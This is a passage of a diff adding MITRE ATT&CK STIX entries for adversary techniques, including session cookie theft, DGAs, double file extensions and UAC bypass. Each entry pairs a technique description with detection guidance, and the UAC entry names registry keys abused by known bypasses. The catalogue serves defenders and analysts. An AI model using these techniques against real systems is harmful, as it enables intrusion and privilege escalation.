[ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ExtraHop", + "David Fiser, @anu4is, Trend Micro", + "Alfredo Oliveira, Trend Micro", + "Idan Frimark, Cisco", + "Rory McCune, Aqua Security", + "Yuval Avrahami, Palo Alto Networks", + "Jay Chen, Palo Alto Networks", + "Brad Geesaman, @bradgeesaman", + "Magno Logan, @magnologan, Trend Micro", + "Ariel Shuper, Cisco", + "Yossi Weizman, Azure Defender Research Team", + "Vishwas Manral, McAfee", + "Daniel Oakley", + "Travis Smith, Tripwire", + "David Tayouri" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.\n\nWhen authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "Containers", + "macOS" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "created": "2017-05-31T21:31:44.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1133", + "external_id": "T1133" + }, + { + "source_name": "Volexity Virtual Private Keylogging", + "description": "Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.", + "url": "https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/" + }, + { + "source_name": "MacOS VNC software for Remote Desktop", + "description": "Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.", + "url": "https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac" + }, + { + "source_name": "Unit 42 Hildegard Malware", + "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.", + "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" + }, + { + "source_name": "Trend Micro Exposed Docker Server", + "description": "Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants Target Exposed Docker Servers. Retrieved April 5, 2021.", + "url": "https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Component Firmware", + "description": "Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "File monitoring", + "Host intrusion prevention systems", + "Anti-virus" + ], + "x_mitre_permissions_required": [ + "SYSTEM" + ], + "x_mitre_system_requirements": [ + "Ability to update component device firmware from the host operating system." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", + "created": "2017-05-31T21:31:22.374Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1109", + "external_id": "T1109" + }, + { + "source_name": "SanDisk SMART", + "description": "SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018." + }, + { + "source_name": "SmartMontools", + "description": "smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018.", + "url": "https://www.smartmontools.org/" + }, + { + "source_name": "ITWorld Hard Disk Health Dec 2014", + "description": "Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.", + "url": "https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "LC_LOAD_DYLIB Addition", + "description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.\n\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847", + "created": "2020-01-24T14:21:52.750Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/006", + "external_id": "T1546.006" + }, + { + "source_name": "Malware Persistence on OS X", + "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "Writing Bad Malware for OSX", + "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.", + "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:56:56.861Z", + "name": "Steal Web Session Cookie", + "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)\n\nThere are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Microsoft Threat Intelligence Center (MSTIC)", + "Johann Rehberger", + "Goldstein Menachem" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "created": "2019-10-08T20:04:35.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1539", + "external_id": "T1539" + }, + { + "source_name": "Krebs Discord Bookmarks 2023", + "description": "Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious Bookmarks. Retrieved January 2, 2024.", + "url": "https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/" + }, + { + "source_name": "Unit 42 Mac Crypto Cookies January 2019", + "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/" + }, + { + "source_name": "Kaspersky TajMahal April 2019", + "description": "GReAT. (2019, April 10). Project TajMahal – a sophisticated new APT framework. Retrieved October 14, 2019.", + "url": "https://securelist.com/project-tajmahal/90240/" + }, + { + "source_name": "Github evilginx2", + "description": "Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.", + "url": "https://github.com/kgretzky/evilginx2" + }, + { + "source_name": "GitHub Mauraena", + "description": "Orrù, M., Trotta, G.. (2019, September 11). Muraena. Retrieved October 14, 2019.", + "url": "https://github.com/muraenateam/muraena" + }, + { + "source_name": "Pass The Cookie", + "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", + "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html" + }, + { + "source_name": "Talos Roblox Scam 2023", + "description": "Tiago Pereira. (2023, November 2). Attackers use JavaScript URLs, API forms and more to scam users in popular online game “Roblox”. Retrieved January 2, 2024.", + "url": "https://blog.talosintelligence.com/roblox-scam-overview/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Container Orchestration Job", + "description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.\n\nIn Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Vishwas Manral, McAfee", + "Yossi Weizman, Azure Defender Research Team" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1126cab1-c700-412f-a510-61f4937bb096", + "created": "2021-03-29T17:06:22.247Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053/007", + "external_id": "T1053.007" + }, + { + "source_name": "Kubernetes CronJob", + "description": "The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021.", + "url": "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/" + }, + { + "source_name": "Kubernetes Jobs", + "description": "The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021.", + "url": "https://kubernetes.io/docs/concepts/workloads/controllers/job/" + }, + { + "source_name": "Threat Matrix for Kubernetes", + "description": "Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.", + "url": "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Domain Generation Algorithms", + "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ryan Benson, Exabeam", + "Barry Shteiman, Exabeam", + "Sylvain Gil, Exabeam" + ], + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "created": "2020-03-10T17:44:59.787Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1568/002", + "external_id": "T1568.002" + }, + { + "source_name": "Cybereason Dissecting DGAs", + "description": "Sternfeld, U. (2016). Dissecting Domain Generation Algorithms: Eight Real World DGA Variants. Retrieved February 18, 2019.", + "url": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf" + }, + { + "source_name": "Cisco Umbrella DGA", + "description": "Scarfo, A. (2016, October 10). Domain Generation Algorithms – Why so effective?. Retrieved February 18, 2019.", + "url": "https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/" + }, + { + "source_name": "Unit 42 DGA Feb 2019", + "description": "Unit 42. (2019, February 7). Threat Brief: Understanding Domain Generation Algorithms (DGA). Retrieved February 19, 2019.", + "url": "https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/" + }, + { + "source_name": "Talos CCleanup 2017", + "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", + "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html" + }, + { + "source_name": "Akamai DGA Mitigation", + "description": "Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of Domain Generation Algorithms. Retrieved February 18, 2019.", + "url": "https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html" + }, + { + "source_name": "FireEye POSHSPY April 2017", + "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + }, + { + "source_name": "ESET Sednit 2017 Activity", + "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.", + "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" + }, + { + "source_name": "Data Driven Security DGA", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/" + }, + { + "source_name": "Pace University Detecting DGA May 2017", + "description": "Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019.", + "url": "http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf" + }, + { + "source_name": "Elastic Predicting DGA", + "description": "Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019.", + "url": "https://arxiv.org/pdf/1611.00791.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Double File Extension", + "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", + "created": "2021-08-04T20:54:03.066Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036/007", + "external_id": "T1036.007" + }, + { + "source_name": "PCMag DoubleExtension", + "description": "PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021.", + "url": "https://www.pcmag.com/encyclopedia/term/double-extension" + }, + { + "source_name": "SOCPrime DoubleExtension", + "description": "Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021.", + "url": "https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/" + }, + { + "source_name": "Seqrite DoubleExtension", + "description": "Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension?. Retrieved July 27, 2021.", + "url": "https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Bypass User Account Control", + "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Stefan Kanthak", + "Casey Smith" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.\n\nSome UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:\n\n* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Classes\\mscfile\\shell\\open\\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)\n\n* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe and [HKEY_CURRENT_USER]\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)\n\nAnalysts should monitor these Registry settings for unauthorized changes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Windows User Account Control" + ], + "x_mitre_effective_permissions": [ + "Administrator" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", + "created": "2020-01-30T14:24:34.977Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1548/002", + "external_id": "T1548.002" + }, + { + "source_name": "Davidson Windows", + "description": "Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.", + "url": "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" + }, + { + "source_name": "TechNet How UAC Works", + "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works" + }, + { + "source_name": "SANS UAC Bypass", + "description": "Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.", + "url": "http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass" + }, + { + "source_name": "MSDN COM Elevation", + "description": "Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/ms679687.aspx" + }, + { + "source_name": "enigma0x3 Fileless UAC Bypass", + "description": "Nelson, M. (2016, August 15). \"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.", + "url": "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/" + }, + { + "source_name": "enigma0x3 sdclt app paths", + "description": "Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.", + "url": "https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/" + }, + { + "source_name": "enigma0x3 sdclt bypass", + "description": "Nelson, M. (2017, March 17). \"Fileless\" UAC Bypass Using 